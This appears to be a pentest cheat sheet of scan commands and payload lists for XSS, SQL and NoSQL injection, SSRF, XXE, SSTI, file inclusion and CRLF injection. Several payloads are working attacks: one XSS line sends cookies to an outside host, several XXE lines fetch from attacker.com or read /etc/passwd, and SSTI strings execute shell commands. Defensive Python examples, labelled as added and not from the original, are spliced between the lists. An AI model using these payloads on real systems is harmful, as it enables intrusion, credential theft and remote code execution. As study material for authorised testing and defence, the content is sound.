# Handy Commands & Payloads

### Nmap

**Initial Port Scan and Service Scan with Evasive Techniques:**

{% code overflow="wrap" %}

```bash
nmap -f -D RND:10 -p- -Pn $TARGET

nmap -sC -sV -p $(nmap -f -D RND:10 -p- -Pn $TARGET | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',') $TARGET
```

{% endcode %}

Other nmap scans:

```bash
sudo nmap -Pn -p 3389 -ff --send-eth --script rdp-enum-encryption $IP
```

### Test SSL

```bash
testssl $URL
```

### Nikto

```bash
nikto -host $URL
nikto -h $URL -O STATIC-COOKIE="Authorization: Bearer..."
```

### Nuclei

```bash
nuclei -u $URL
nuclei -u $URL -H "cookie: "

# Use secrets.yaml file for other authentication mechanisms
```

### Nuclei Fuzzer

```bash
nf -d $URL
```

### Directory Fuzzing

1. **Gobuster:**

   <pre class="language-bash" data-overflow="wrap"><code class="lang-bash">gobuster dir -u $URL -t 20 -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -b 302,404 -o gobuster_dir.txt
   </code></pre>
2. **ffuf (Basic):**

   <pre class="language-bash" data-overflow="wrap"><code class="lang-bash">ffuf -u $URL/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -mc 200 -c -r -sf -t 20 -o ffuf_dir.csv -of csv
   </code></pre>
3. **Ffuf (API):**

   <pre class="language-bash" data-overflow="wrap"><code class="lang-bash">ffuf -request api.req -w /opt/SecLists/Discovery/Web-Content/api/common-paths,actions-lowercase,/opt/SecLists/Fuzzing/special-chars.txt -request-proto http -mc 200 -c -r -sf -o ffuf_api_dir.csv -of csv
   </code></pre>

### VHOST Fuzzing

{% code overflow="wrap" %}

```bash
ffuf -H "Host: FUZZ.collect.htb" -u http://collect.htb/ -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -mc all -c -r -sf -ac -o subd_ffuf.txt
```

{% endcode %}

### SQLi

```bash
sqlmap -r app.req --level 5 --risk 3 --batch
```

### XSS Best Payloads

```html
<script>alert(1)</script>
<script src=//14.rs></script>
"><svg onload=alert()>
<embed src=//14.rs>
<!--><script src=//14.rs>
url=%26%2302java%26%23115cript:alert(document.domain)
<video><source onerror=location=/\02.rs/+document.cookie>
<script>alert(document.domain)</script>
<a href=javascript:confirm()>click here
```

### SQL Injection Payloads

```sql
' OR '1'='1
' OR '1'='1' --
' OR '1'='1' /* 
' OR '1'='1' //
' OR '1'='1' #
admin' --
admin' /*
admin' //
admin' #
' OR 1=1
' OR 1=1 --
' OR 1=1 /*
' OR 1=1 //
' OR 1=1 #
' OR 'a'='a
' OR 'a'='a' --
' OR 'a'='a' /*
' OR 'a'='a' //
' OR 'a'='a' #
```
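The payloads above only work when user input is spliced into the SQL text. As an added example (not from the original page), the snippet below builds a constructed in-memory SQLite table and runs the same login check twice: once with string formatting, where `' OR '1'='1` and `admin' --` both authenticate, and once with a parameterized query, where the same strings are bound as plain values and fail. The table contents and the `demo()` helper are assumptions made for the demo.

```python
import sqlite3

# Constructed in-memory user table for this demo; not from the page.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'correct-horse-battery-staple')")
    conn.commit()
    return conn

def login_vulnerable(conn, username, password):
    """String concatenation: the quote in the payload closes the literal and
    the rest of the payload becomes SQL, so ' OR '1'='1 always matches and
    admin' -- comments out the password check entirely."""
    query = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
             % (username, password))
    return conn.execute(query).fetchone() is not None

def login_safe(conn, username, password):
    """Parameterized query: the driver binds the payload as a string value,
    so it is only ever compared against the stored password."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row is not None

def demo():
    """Run both implementations against the page's tautology and comment payloads."""
    conn = make_db()
    tautology = "' OR '1'='1"
    return {
        "vulnerable_tautology": login_vulnerable(conn, "nobody", tautology),
        "vulnerable_comment": login_vulnerable(conn, "admin' --", "wrong"),
        "safe_tautology": login_safe(conn, "nobody", tautology),
        "safe_comment": login_safe(conn, "admin' --", "wrong"),
        "safe_real_login": login_safe(conn, "admin", "correct-horse-battery-staple"),
    }

if __name__ == "__main__":
    for check, result in demo().items():
        print(f"{check}: {result}")
```

Only the `--` and bare tautology forms are exercised here because SQLite does not treat `#` or `//` as comment markers; those variants exist for MySQL and other engines, which is why the list carries several spellings of the same idea.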

### NoSQL Injection Payloads

```json
{"username": {"$ne": null}, "password": {"$ne": null}}
{"username": "admin", "password": {"$ne": null}}
{"username": "admin", "password": {"$gt": ""}}
{"username": "admin", "password": {"$in": [""]}}
{"username": "admin", "password": {"$where": "this.password.length > 0"}}
{"username": {"$gt": ""}, "password": {"$gt": ""}}
{"username": {"$regex": ".*"}, "password": {"$ne": null}}
{"username": {"$eq": "admin"}, "password": {"$ne": "admin"}}
{"username": {"$ne": "admin"}, "password": {"$exists": true}}
{"username": {"$in": ["admin", "user"]}, "password": {"$ne": "password"}}
```
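Every payload above relies on the server passing a JSON object where it expected a string, so that `$ne`, `$gt`, `$regex` and friends are interpreted as query operators. As an added example (not from the original page), the code below shows the two defender-side checks that close this off: a recursive scan for operator keys, useful for request logging and detection, and a filter builder that accepts only string credentials. The request bodies are constructed for the demo; `build_login_filter` is a hypothetical helper, not a MongoDB driver function.

```python
import json

def contains_operator(value):
    """True if any key anywhere in the JSON value starts with '$' (a MongoDB
    query operator). Operators must never come from user-supplied field values."""
    if isinstance(value, dict):
        return any(k.startswith("$") or contains_operator(v) for k, v in value.items())
    if isinstance(value, list):
        return any(contains_operator(v) for v in value)
    return False

def body_has_operator(body):
    """Convenience wrapper: parse a raw JSON body and scan it for operators."""
    return contains_operator(json.loads(body))

def build_login_filter(body):
    """Turn a JSON login body into a query filter, accepting only plain strings.
    Raises ValueError for anything that could change the query's meaning."""
    data = json.loads(body)
    username = data.get("username")
    password = data.get("password")
    if not isinstance(username, str) or not isinstance(password, str):
        raise ValueError("username and password must be strings")
    if contains_operator(data):  # defence in depth; the type check already rejects objects
        raise ValueError("query operators are not allowed in credentials")
    return {"username": username, "password": password}

# Constructed request bodies; the first mirrors the payloads listed above.
INJECTED = '{"username": {"$ne": null}, "password": {"$ne": null}}'
BENIGN = '{"username": "admin", "password": "hunter2"}'

def demo():
    """Show the injected body being rejected and the benign one being accepted."""
    results = {}
    for label, body in (("injected", INJECTED), ("benign", BENIGN)):
        try:
            results[label] = build_login_filter(body)
        except ValueError as exc:
            results[label] = f"rejected: {exc}"
    return results

if __name__ == "__main__":
    print(demo())
```

The type check is the real fix; `contains_operator` is there so the same rule can be applied generically (for example in a request-logging middleware) to any JSON field that should only ever hold scalar data.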

### SSRF Payloads

```http
# Retrieve AWS Metadata
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/user-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/
http://169.254.169.254/latest/meta-data/public-keys/
http://169.254.169.254/latest/meta-data/network/interfaces/macs/

http://127.0.0.1:80
http://127.0.0.1:8080
http://localhost:80
http://localhost:8080
http://0.0.0.0:80
http://0.0.0.0:8080
http://[::]:80
http://[::]:8080
http://[::1]:80
http://[::1]:8080
http://internal-service:80
http://internal-service:8080
```
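The SSRF list is mostly addresses that should never be reachable from a server-side fetch: the cloud metadata endpoint, loopback, the unspecified address and internal hostnames. As an added example (not from the original page), the function below is the check a defender would put in front of any URL-fetching feature: it allows only `http`/`https`, resolves the host, and rejects every non-public address, including IPv4-mapped IPv6 forms such as `::ffff:127.0.0.1` that naive loopback checks miss. The function name and the `ALLOWED_SCHEMES` set are assumptions for the demo.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}

def is_non_public(ip):
    """Loopback, link-local (cloud metadata lives at 169.254.169.254), unspecified
    (0.0.0.0 / ::), private, multicast and reserved ranges are all off limits."""
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped  # ::ffff:127.0.0.1 must be judged as 127.0.0.1
    return (ip.is_loopback or ip.is_link_local or ip.is_unspecified
            or ip.is_private or ip.is_multicast or ip.is_reserved)

def check_outbound_url(url):
    """Return (allowed, reason). Fails closed: unknown scheme, missing host,
    unresolvable host or any non-public address means the fetch is rejected."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    host = parts.hostname
    if not host:
        return False, "missing host"
    try:
        addrs = [ipaddress.ip_address(host)]          # literal IP, v4 or bracketed v6
    except ValueError:
        try:
            infos = socket.getaddrinfo(host, None)    # hostname: check every A/AAAA answer
        except socket.gaierror:
            return False, f"cannot resolve {host!r}"
        addrs = [ipaddress.ip_address(info[4][0].split("%")[0]) for info in infos]
    for ip in addrs:
        if is_non_public(ip):
            return False, f"{host} is a non-public address ({ip})"
    return True, "ok"

if __name__ == "__main__":
    # Constructed inputs taken from the list above plus one public address.
    for u in ("http://169.254.169.254/latest/meta-data/", "http://[::1]:80",
              "http://[::ffff:127.0.0.1]/", "https://8.8.8.8/"):
        print(u, check_outbound_url(u))
```

Resolving at validation time still leaves a DNS-rebinding window between the check and the connect; in production the same address test should run on the socket the HTTP client actually opens (or the client should be given the already-validated IP and the original hostname in the `Host` header).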

### XXE Payloads

```xml
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]><foo>&xxe;</foo>
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///c:/windows/win.ini" > ]><foo>&xxe;</foo>
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "http://attacker.com/evil.dtd" > ]><foo>&xxe;</foo>
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "ftp://attacker.com/evil.txt" > ]><foo>&xxe;</foo>
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "jar:http://attacker.com/evil.jar!/" > ]><foo>&xxe;</foo>
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "gopher://attacker.com/evil" > ]><foo>&xxe;</foo>
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "data:text/plain,evil" > ]><foo>&xxe;</foo>
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "expect://id" > ]><foo>&xxe;</foo>
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=index.php" > ]><foo>&xxe;</foo>
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "php://input" > ]><foo>&xxe;</foo>
```

### SSTI Payloads

```jinja
# jinja
{{7*7}}
{{7*'7'}}
{{7*'7'.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}
{{config.items()}}
{{''.__class__.__mro__[2].__subclasses__()}}
{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}
{{request['application']['__globals__']['__builtins__']['__import__']('os').popen('id').read()}}
{% for c in [].__class__.__base__.__subclasses__() %}
{{c}}
{% endfor %}
{{''.__class__.mro()[1].__subclasses__()[40].__init__.__globals__['__builtins__']['__import__']('os').popen('id').read()}}
{{config['SECRET_KEY'].__class__.__mro__[2].__subclasses__()[40]('id').read()}}
{{request.application.__globals__.__builtins__.open('index.html').read()}}
```

### File Inclusion Payloads

```php
../../../../../../etc/passwd
../../../../../../boot.ini
../../../../../../windows/win.ini
../../../../../../winnt/win.ini
../../../../../../windows/system.ini
../../../../../../windows/system32/drivers/etc/hosts
../../../../../../winnt/system32/drivers/etc/hosts
../../../../../../apache/logs/access.log
../../../../../../apache/logs/error.log
../../../../../../usr/local/apache/logs/access.log
../../../../../../usr/local/apache/logs/error.log
../../../../../../var/www/html/index.php
../../../../../../var/www/html/wp-config.php
../../../../../../usr/local/etc/php.ini
../../../../../../etc/httpd/conf/httpd.conf
../../../../../../etc/mysql/my.cnf
```
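All of these payloads depend on the application joining user input onto a base directory without checking where the result ends up. As an added example (not from the original page), `safe_join` below is the standard mitigation: decode once, resolve the candidate path, and accept it only if the resolved location is still inside the base directory. Because the decision is made on the resolved path rather than on the presence of `../`, URL-encoded dots and traversal sequences that happen to climb back into the base directory are both handled correctly. The base directory `/srv/app/public` and the function name are assumptions for the demo.

```python
from pathlib import Path
from typing import Optional
from urllib.parse import unquote

def safe_join(base_dir, requested):
    # type: (str, str) -> Optional[Path]
    """Resolve `requested` beneath `base_dir`; return None if it escapes."""
    base = Path(base_dir).resolve()
    # Decode once so %2e%2e%2f is judged as ../ ; double-encoded input should have
    # been rejected by the web framework before reaching this point.
    cleaned = unquote(requested)
    if "\x00" in cleaned:               # null-byte truncation tricks
        return None
    cleaned = cleaned.lstrip("/\\")     # a leading slash would make the join absolute
    candidate = (base / cleaned).resolve()
    try:
        candidate.relative_to(base)     # raises ValueError when outside base
    except ValueError:
        return None
    return candidate

if __name__ == "__main__":
    # Constructed inputs: the first two are from the list above.
    for req in ("../../../../../../etc/passwd",
                "../../../../../../var/www/html/wp-config.php",
                "%2e%2e/%2e%2e/%2e%2e/etc/passwd",
                "images/logo.png"):
        print(f"{req!r:55} -> {safe_join('/srv/app/public', req)}")
```

Note that a traversal string that resolves back inside the base directory (the `wp-config.php` case when the base really is `/var/www/html`) is accepted, which is correct: the file served is the one the application would have served for a clean path, so there is no escape to report.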

### CRLF Injection Payloads

{% code overflow="wrap" %}

```http
GET / HTTP/1.1\r\nHost: example.com\r\nX-Custom-Header: custom-value\r\n

GET /index.html HTTP/1.1\r\nHost: example.com\r\nX-Injected-Header: injected-value\r\n

POST /submit HTTP/1.1\r\nHost: example.com\r\nX-Custom-Header: custom-value\r\n

GET / HTTP/1.1\r\nHost: example.com\r\nSet-Cookie: injected-cookie=value\r\n

POST /login HTTP/1.1\r\nHost: example.com\r\nX-Injected-Header: injected-value\r\n

GET /search?q=test HTTP/1.1\r\nHost: example.com\r\nX-Injected-Header: injected-value\r\n

POST /upload HTTP/1.1\r\nHost: example.com\r\nX-Custom-Header: custom-value\r\n

GET /download HTTP/1.1\r\nHost: example.com\r\nX-Injected-Header: injected-value\r\n

POST /create HTTP/1.1\r\nHost: example.com\r\nX-Custom-Header: custom-value\r\n

GET /api/v1/data HTTP/1.1\r\nHost: example.com\r\nX-Injected-Header: injected-value\r\n
```

{% endcode %}

## Easy Vulnerabilities & Security Misconfigurations to Report

Vulnerabilities that could be found in the early stages (first few hours) of a pentest.

### Security Headers

* **Misconfigured Security Headers:**
  * X-Frame-Options
  * X-XSS-Protection
  * X-Content-Type-Options
  * Strict-Transport-Security
  * Content-Security-Policy (CSP)
  * Referrer-Policy

### Cross-Origin Resource Sharing (CORS)

* **Insecure CORS Configuration:**
  * Allowing wildcard (\*) origin
  * Allowing untrusted origins
  * Lack of proper validation

### Cookie Attributes

* **Insecure Cookie Attributes:**
  * Missing HttpOnly flag
  * Missing Secure flag
  * Missing SameSite attribute
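The three sections above (security headers, CORS, cookie attributes) are all decided from a single HTTP response, so they are worth checking together. As an added example (not from the original page), the script below parses a constructed raw response and reports missing security headers, a wildcard or reflected `Access-Control-Allow-Origin` (flagging the credentialed case separately), a version-bearing `Server` banner, and any `Set-Cookie` lacking `HttpOnly`, `Secure` or `SameSite`. The sample response, the untrusted origin and the set of required headers are assumptions for the demo.

```python
REQUIRED_HEADERS = {
    "strict-transport-security",
    "content-security-policy",
    "x-frame-options",
    "x-content-type-options",
    "referrer-policy",
}

COOKIE_ATTRS = (("httponly", "HttpOnly"), ("secure", "Secure"), ("samesite", "SameSite"))

def parse_headers(raw):
    """Return [(lower-cased name, value), ...] from a raw HTTP response text."""
    headers = []
    for line in raw.splitlines():
        if line.startswith("HTTP/") or ":" not in line:
            continue
        name, value = line.split(":", 1)
        headers.append((name.strip().lower(), value.strip()))
    return headers

def audit_response(raw, request_origin=None):
    """List findings in the order a report would present them."""
    findings = []
    headers = parse_headers(raw)
    present = {name for name, _ in headers}
    for name in sorted(REQUIRED_HEADERS - present):
        findings.append(f"missing header: {name}")

    acao = next((v for n, v in headers if n == "access-control-allow-origin"), None)
    creds = any(n == "access-control-allow-credentials" and v.lower() == "true"
                for n, v in headers)
    if acao == "*":
        findings.append("CORS: wildcard Access-Control-Allow-Origin")
    elif acao and request_origin and acao == request_origin:
        findings.append("CORS: request Origin reflected"
                        + (" with credentials" if creds else ""))

    for name, value in headers:
        if name == "server" and any(ch.isdigit() for ch in value):
            findings.append(f"server banner discloses version: {value}")
        if name == "set-cookie":
            cookie_name = value.split(";", 1)[0].split("=", 1)[0].strip()
            attrs = {part.strip().split("=", 1)[0].lower() for part in value.split(";")[1:]}
            for attr, label in COOKIE_ATTRS:
                if attr not in attrs:
                    findings.append(f"cookie {cookie_name}: missing {label}")
    return findings

# Constructed response: one weak session cookie, one hardened cookie, reflected origin.
SAMPLE_RESPONSE = """\
HTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Content-Type: text/html
Access-Control-Allow-Origin: https://untrusted.example
Access-Control-Allow-Credentials: true
Set-Cookie: session=abc123; Path=/
Set-Cookie: theme=dark; Path=/; Secure; HttpOnly; SameSite=Lax
X-Content-Type-Options: nosniff
"""

if __name__ == "__main__":
    for finding in audit_response(SAMPLE_RESPONSE, request_origin="https://untrusted.example"):
        print(finding)
```

`X-XSS-Protection` is deliberately not in `REQUIRED_HEADERS`: current browsers ignore it, so its absence is not worth a finding even though the list above still names it. A reflected origin is only a problem when the reflected value was not on an allowlist, which is why the caller passes the origin it sent.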

### Authentication & Session Management

* **Concurrent Logins Allowed:**
  * Multiple sessions from different IPs
* **Improper Session Timeout:**
  * Long or no session expiration
* **Improper Invalidation of Cookie Post Logout:**
  * Session remains active after logout
* **Weak Password Policies:**
  * No complexity requirements
  * Lack of rate limiting

### File Handling

* **Unrestricted File Upload:**
  * No file type validation
  * No file size restrictions
  * No scanning for malware

### Access Controls

* **Staging Environment Accessible from External Network:**
  * Exposed internal environments
* **Sensitive Directories Accessible:**
  * /.git/, /.svn/, /backup/, /config/

### Web Server Configuration

* **Clickjacking:**
  * Missing X-Frame-Options header
* **Weak SSL Ciphers:**
  * Use of deprecated SSL/TLS versions
  * Weak cipher suites enabled
* **Web Server Fingerprinting:**
  * Banner Grabbing revealing server information

### Information Disclosure

* **Verbose Error Messages:**
  * Detailed stack traces
  * Application/Server details in error messages
* **Directory Listing Enabled:**
  * Ability to list files in web directories

### Business Logic & Other Issues

* **Lack of Rate Limiting:**
  * Brute force or DoS vulnerabilities
* **No Account Lockout:**
  * Unlimited login attempts
* **Weak Default Credentials:**
  * Use of default passwords for admin accounts
* **HTTP Methods:**
  * TRACE/TRACK methods enabled
* **Referrer Policy:**
  * No Referrer Policy header
* **API Security:**
  * Lack of authentication
  * Lack of rate limiting
  * Exposed sensitive endpoints
* **Insecure Direct Object References (IDOR):**
  * Direct access to unauthorized resources
* **Lack of Input Validation:**
  * No sanitization of user input
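"Lack of rate limiting" and "No account lockout" appear under both the authentication and business-logic headings above because they are the same control seen from two sides. As an added example (not from the original page), the class below is a minimal sliding-window throttle for a login endpoint: after `limit` failed attempts within `window` seconds the account is locked for `lockout` seconds, and a successful login clears the history. The class name, the default thresholds and the injectable `clock` are assumptions for the demo.

```python
import time
from collections import defaultdict, deque

class LoginThrottle:
    """Sliding-window limiter: at most `limit` failures per `window` seconds,
    after which the account is locked for `lockout` seconds."""

    def __init__(self, limit=5, window=300.0, lockout=900.0, clock=time.monotonic):
        self.limit = limit
        self.window = window
        self.lockout = lockout
        self.clock = clock                    # injectable so tests need not sleep
        self.failures = defaultdict(deque)    # account -> timestamps of recent failures
        self.locked_until = {}                # account -> monotonic time the lock expires

    def is_locked(self, account):
        until = self.locked_until.get(account)
        if until is None:
            return False
        if self.clock() >= until:             # lock expired: start with a clean slate
            del self.locked_until[account]
            self.failures[account].clear()
            return False
        return True

    def record_failure(self, account):
        now = self.clock()
        recent = self.failures[account]
        recent.append(now)
        while recent and now - recent[0] > self.window:   # drop failures outside the window
            recent.popleft()
        if len(recent) >= self.limit:
            self.locked_until[account] = now + self.lockout

    def record_success(self, account):
        self.failures.pop(account, None)
        self.locked_until.pop(account, None)

    def attempt(self, account, password_ok):
        """Gate a login attempt: returns False if locked or if the password failed."""
        if self.is_locked(account):
            return False
        if password_ok:
            self.record_success(account)
            return True
        self.record_failure(account)
        return False

if __name__ == "__main__":
    throttle = LoginThrottle(limit=3, window=60, lockout=120)
    for i in range(4):
        print(f"attempt {i + 1}: ok={throttle.attempt('alice', False)}, "
              f"locked={throttle.is_locked('alice')}")
```

Per-account lockout on its own lets anyone lock a victim out by guessing wrong on purpose, so in practice it is paired with a per-source-IP limit and a challenge (CAPTCHA or step-up) rather than a hard lock; the failure log it keeps is also exactly the event feed the "Insufficient Logging and Monitoring" item below asks for.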

### Additional Points

* **Backup Files Accessible:**
  * .bak, .old, .save files accessible
* **Exposed API Keys or Tokens:**
  * API keys or tokens in URLs, JavaScript, etc.
* **Insufficient Logging and Monitoring:**
  * Lack of logging for security events
* **Cross-Site Request Forgery (CSRF):**
  * Missing or incorrect CSRF tokens
* **Insufficient Transport Layer Security:**
  * HTTP instead of HTTPS
* **Autocomplete Enabled for Sensitive Fields:**
  * Sensitive form fields have autocomplete enabled
* **Insecure Directories:**
  * /admin/, /config/, /backup/ directories exposed
* **Insecure Third-Party Integrations:**
  * Unpatched or outdated third-party libraries and frameworks
